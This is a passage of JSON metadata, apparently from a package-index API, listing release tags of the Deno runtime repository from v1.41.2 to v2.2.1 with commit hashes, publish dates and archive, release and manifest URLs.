eno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":